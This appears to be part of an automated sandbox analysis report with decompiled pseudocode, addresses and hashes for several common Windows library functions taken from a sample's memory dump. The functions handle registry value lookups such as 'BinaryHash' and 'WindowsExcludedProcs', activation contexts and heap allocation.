                    Function 0169F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E0169F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01684120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E016A9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E016A9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E016A95D0();
							goto L11;
						} else {
							_t109 = L01684620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E016AF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E016A95D0();
										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                    0x0169f0d3
                    0x0169f0d9
                    0x0169f0e0
                    0x0169f0e7
                    0x0169f0f2
                    0x0169f0f4
                    0x0169f0f8
                    0x0169f100
                    0x0169f108
                    0x0169f10d
                    0x0169f115
                    0x0169f116
                    0x0169f11f
                    0x0169f123
                    0x0169f124
                    0x0169f12c
                    0x0169f130
                    0x0169f134
                    0x0169f13d
                    0x0169f144
                    0x0169f14b
                    0x0169f152
                    0x016dbab0
                    0x016dbab0
                    0x0169f158
                    0x0169f158
                    0x0169f15a
                    0x0169f160
                    0x0169f165
                    0x0169f166
                    0x0169f16f
                    0x0169f173
                    0x016dbaa7
                    0x016dbaa7
                    0x016dbaab
                    0x00000000
                    0x0169f179
                    0x0169f18d
                    0x0169f191
                    0x016dbaa2
                    0x00000000
                    0x0169f197
                    0x0169f19b
                    0x0169f1a2
                    0x0169f1a9
                    0x0169f1af
                    0x0169f1b2
                    0x0169f1b6
                    0x0169f1b9
                    0x0169f1c4
                    0x0169f1d8
                    0x0169f1df
                    0x0169f1e3
                    0x0169f1eb
                    0x0169f1ee
                    0x0169f1f4
                    0x0169f20f
                    0x016dbab7
                    0x016dbabb
                    0x016dbacc
                    0x016dbad1
                    0x0169f215
                    0x0169f218
                    0x0169f226
                    0x0169f22b
                    0x00000000
                    0x0169f22b
                    0x0169f1f6
                    0x0169f1f6
                    0x0169f1f9
                    0x0169f1fb
                    0x0169f1fb
                    0x0169f1f4
                    0x0169f191
                    0x0169f173
                    0x0169f152
                    0x0169f203

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction ID: 877d7d16e725c5e8d480001fa25a62ee6ed8dacad909a647550761c29cf0397c
                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                    • Instruction Fuzzy Hash: CE517A71504711AFC320DF29C840A6BBBF9FF48714F118A2EFA9587690E7B4E904CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E016E3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x175d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E016A0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E016E3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E016AFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E016E3540;
						E016AFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E016BDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E016F0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E016A97C0();
					}
					return E016AB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E016E3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E016E3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E016AFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E016A9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E016E3787(_a4,  &_v352, _t80);
						}
					}
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016A95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                    0x016e3552
                    0x016e355a
                    0x016e355d
                    0x016e3566
                    0x016e3567
                    0x016e357e
                    0x016e358f
                    0x016e35a1
                    0x016e35a5
                    0x016e366b
                    0x016e366b
                    0x016e366d
                    0x016e3672
                    0x016e3679
                    0x016e3685
                    0x016e368d
                    0x016e369d
                    0x016e36a7
                    0x016e36b8
                    0x016e36c6
                    0x016e36c7
                    0x016e36dc
                    0x016e36e1
                    0x016e36e7
                    0x016e36e9
                    0x016e36e9
                    0x016e3703
                    0x016e3703
                    0x016e35b5
                    0x016e35c0
                    0x016e35c4
                    0x00000000
                    0x00000000
                    0x016e35ca
                    0x016e35d7
                    0x016e35e2
                    0x016e35e6
                    0x016e35e8
                    0x016e35f5
                    0x016e35fa
                    0x016e3603
                    0x016e3604
                    0x016e3609
                    0x016e360a
                    0x016e3612
                    0x016e3613
                    0x016e361e
                    0x016e3622
                    0x016e3628
                    0x016e362f
                    0x016e362f
                    0x016e3636
                    0x016e3638
                    0x016e363b
                    0x016e3642
                    0x016e3642
                    0x016e3636
                    0x016e3657
                    0x016e3657
                    0x016e365c
                    0x016e3662
                    0x016e3669
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryHash
                    • API String ID: 0-2202222882
                    • Opcode ID: c8c6cc766b8d40657a85675f5d5dc576299c05f2a0c4b218b811278345b3cfa8
                    • Instruction ID: be88f7a8e3efe557df6d5b1c27a106e276033fc911a4b13e9204317f83b9db51
                    • Opcode Fuzzy Hash: c8c6cc766b8d40657a85675f5d5dc576299c05f2a0c4b218b811278345b3cfa8
                    • Instruction Fuzzy Hash: 474158B1D0152D9BDB21DA60CC84FEEB77DAB44714F0045D9EB09A7240DB309E88CF98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017305AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E017305AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E017307DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E016A9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0172A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0172A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01731293(_t79, _v40, E017307DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01687D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0172138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                    0x017305c5
                    0x017305ca
                    0x017305d3
                    0x017306db
                    0x017306db
                    0x017306dd
                    0x017306e3
                    0x017306e3
                    0x017305dd
                    0x017305e7
                    0x017305f6
                    0x01730600
                    0x01730607
                    0x01730610
                    0x01730615
                    0x0173061a
                    0x0173061c
                    0x0173061e
                    0x01730624
                    0x01730625
                    0x01730627
                    0x01730628
                    0x01730631
                    0x01730640
                    0x0173064d
                    0x01730654
                    0x01730654
                    0x01730631
                    0x0173066d
                    0x01730674
                    0x00000000
                    0x00000000
                    0x01730692
                    0x0173069e
                    0x017306b0
                    0x017306a0
                    0x017306a9
                    0x017306a9
                    0x017306b8
                    0x017306d6
                    0x017306d6
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: `
                    • API String ID: 0-2679148245
                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction ID: 88ea78ee2e2ca5e8ecde6cd1d4dba92b4505aabeb00c5b0234cd323df3c53b54
                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                    • Instruction Fuzzy Hash: AF311332304316ABE720DE29CC84F9BBBD9EBC4754F144229FA58DB685D770E914CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016E3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E016E3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E016A9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01684620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E016A9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                    0x016e3893
                    0x016e3896
                    0x016e3899
                    0x016e389f
                    0x016e38a0
                    0x016e38a4
                    0x016e38a9
                    0x016e38ac
                    0x016e38ad
                    0x016e38ae
                    0x016e38af
                    0x016e38b1
                    0x016e38b4
                    0x016e38bb
                    0x016e38bc
                    0x016e38bd
                    0x016e38c4
                    0x016e38c8
                    0x016e38ca
                    0x016e38ca
                    0x016e38d5
                    0x016e393e
                    0x016e3940
                    0x016e3942
                    0x016e3952
                    0x016e3954
                    0x016e3961
                    0x016e3961
                    0x016e3967
                    0x016e396e
                    0x016e396e
                    0x016e3947
                    0x016e394c
                    0x00000000
                    0x016e394c
                    0x016e38ea
                    0x016e38ee
                    0x016e38f8
                    0x016e38f9
                    0x016e38ff
                    0x016e3900
                    0x016e3902
                    0x016e3903
                    0x016e390b
                    0x016e390f
                    0x016e3950
                    0x00000000
                    0x016e3950
                    0x016e3915
                    0x016e391d
                    0x016e391d
                    0x016e3922
                    0x016e3926
                    0x00000000
                    0x016e3928
                    0x016e392b
                    0x016e392b
                    0x016e3935
                    0x016e3937
                    0x016e3937
                    0x00000000
                    0x016e3935
                    0x016e3926
                    0x016e38f0
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: BinaryName
                    • API String ID: 0-215506332
                    • Opcode ID: fe34f904f235bb87cc0000e4b412c3c11d5178bf50ab7ac328099bcd99feb44f
                    • Instruction ID: 2e653852b0ba3b9ad9e612479c224b123dd1cc0e5a4c2bef0596bdef30abcb25
                    • Opcode Fuzzy Hash: fe34f904f235bb87cc0000e4b412c3c11d5178bf50ab7ac328099bcd99feb44f
                    • Instruction Fuzzy Hash: 0431D47290251ABFEB15DA58CD49E6BBBB5FF80720F124269E914A7351E7309E01C7E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0169D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                    Download Yara Rule
                    C-Code - Quality: 33%
                    			E0169D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x175d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01684120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E016AB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016A98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016A95D0();
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                    0x0169d29c
                    0x0169d2a6
                    0x0169d2b1
                    0x0169d2b5
                    0x0169d2b6
                    0x0169d2bc
                    0x0169d2bd
                    0x0169d2be
                    0x0169d2bf
                    0x0169d2c2
                    0x0169d2c4
                    0x0169d2cc
                    0x0169d384
                    0x0169d34b
                    0x0169d34f
                    0x0169d350
                    0x0169d351
                    0x0169d35c
                    0x0169d35c
                    0x0169d2d6
                    0x0169d2da
                    0x0169d2e1
                    0x0169d361
                    0x0169d369
                    0x0169d36d
                    0x0169d2e3
                    0x0169d2e3
                    0x0169d2e3
                    0x0169d2e5
                    0x0169d2ed
                    0x0169d2f5
                    0x0169d2fa
                    0x0169d302
                    0x0169d303
                    0x0169d30b
                    0x0169d30f
                    0x0169d313
                    0x0169d318
                    0x0169d31c
                    0x0169d320
                    0x0169d379
                    0x0169d37d
                    0x00000000
                    0x00000000
                    0x016daffe
                    0x016db001
                    0x016db011
                    0x00000000
                    0x0169d322
                    0x0169d322
                    0x0169d330
                    0x0169d337
                    0x0169d35d
                    0x0169d339
                    0x0169d33f
                    0x0169d38c
                    0x0169d38c
                    0x0169d33f
                    0x0169d349
                    0x00000000
                    0x0169d349

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: @
                    • API String ID: 0-2766056989
                    • Opcode ID: e2691eb16ca8c941316491b53ee1de05da8f9fbc33d3c63b06b8b7c4146a05d2
                    • Instruction ID: fb0dd9876a04b56c19da01cd5cb6a8116dcbefa62a9956d98685807e2750a610
                    • Opcode Fuzzy Hash: e2691eb16ca8c941316491b53ee1de05da8f9fbc33d3c63b06b8b7c4146a05d2
                    • Instruction Fuzzy Hash: BA318DB1508305AFCB21DF68CD80A6BBBEDEB9A654F400A2EF994C3250D735DD05CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01671B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                    Download Yara Rule
                    C-Code - Quality: 72%
                    			E01671B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E016ABB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E016AA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E016AA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01684620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                    0x01671b8f
                    0x01671b9a
                    0x01671b9c
                    0x01671b9e
                    0x01671ba3
                    0x016c7010
                    0x016c7010
                    0x00000000
                    0x01671ba9
                    0x01671ba9
                    0x01671bae
                    0x00000000
                    0x01671bc5
                    0x01671bca
                    0x01671bcf
                    0x01671bd0
                    0x01671bd1
                    0x01671bd2
                    0x01671bd6
                    0x01671bdc
                    0x01671be0
                    0x016c6ffc
                    0x016c7000
                    0x00000000
                    0x016c7006
                    0x016c7009
                    0x016c7009
                    0x01671be6
                    0x01671bec
                    0x01671c0b
                    0x01671c0b
                    0x01671c0c
                    0x01671c11
                    0x01671c12
                    0x01671c15
                    0x01671c1b
                    0x01671c1f
                    0x01671c31
                    0x01671c33
                    0x016c7026
                    0x016c7026
                    0x01671c21
                    0x01671c24
                    0x01671c24
                    0x01671bee
                    0x01671bee
                    0x01671bf2
                    0x01671c3a
                    0x01671bf4
                    0x01671bf4
                    0x01671c05
                    0x01671c05
                    0x01671c09
                    0x01671c3e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01671c09
                    0x01671bec
                    0x01671be0
                    0x01671bae
                    0x01671c2e

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: WindowsExcludedProcs
                    • API String ID: 0-3583428290
                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction ID: 54c11fda5ab83671fe436e29d5075fbe45b90d8cc083ae5397454b8f9e88c7d8
                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                    • Instruction Fuzzy Hash: BA21DA7B601129ABDB22DA99CC40F6B7BADEF42A54F05446AFE049B300D734DD01DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0168F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0168F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                    0x0168f71d
                    0x0168f722
                    0x0168f726
                    0x016d4770
                    0x0168f765
                    0x0168f769
                    0x0168f769
                    0x0168f732
                    0x016d477a
                    0x00000000
                    0x016d477a
                    0x0168f738
                    0x0168f73a
                    0x0168f73c
                    0x0168f73f
                    0x0168f746
                    0x0168f778
                    0x0168f7a9
                    0x0168f7a9
                    0x0168f754
                    0x0168f75a
                    0x0168f75d
                    0x0168f75f
                    0x0168f761
                    0x0168f76f
                    0x0168f771
                    0x0168f771
                    0x0168f76f
                    0x0168f763
                    0x00000000
                    0x0168f763
                    0x0168f77d
                    0x0168f7a3
                    0x0168f7a5
                    0x00000000
                    0x0168f7a5
                    0x0168f77f
                    0x0168f782
                    0x0168f784
                    0x0168f786
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0168f788
                    0x0168f748
                    0x0168f74d
                    0x0168f78d
                    0x0168f793
                    0x0168f7b7
                    0x0168f7bc
                    0x00000000
                    0x0168f7bc
                    0x0168f798
                    0x00000000
                    0x00000000
                    0x0168f79d
                    0x0168f7b0
                    0x00000000
                    0x0168f7b0
                    0x0168f79f
                    0x00000000
                    0x0168f74f
                    0x0168f74f
                    0x00000000
                    0x0168f74f

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Actx
                    • API String ID: 0-89312691
                    • Opcode ID: 55c4acfa3369f6a5bd734a0aff805f45ca032230b7172ac6fd4b1d825c529d88
                    • Instruction ID: 0d58c19aa6f326d0c8c418ee2f81c58a3bc42f1639188f2dd00a7303d4aafd04
                    • Opcode Fuzzy Hash: 55c4acfa3369f6a5bd734a0aff805f45ca032230b7172ac6fd4b1d825c529d88
                    • Instruction Fuzzy Hash: 711104347087028BFB247E1CAC9073676D5EB86624F2547BAE562DB391DB74CC028340
                    Uniqueness

                    Uniqueness Score: -1.00%

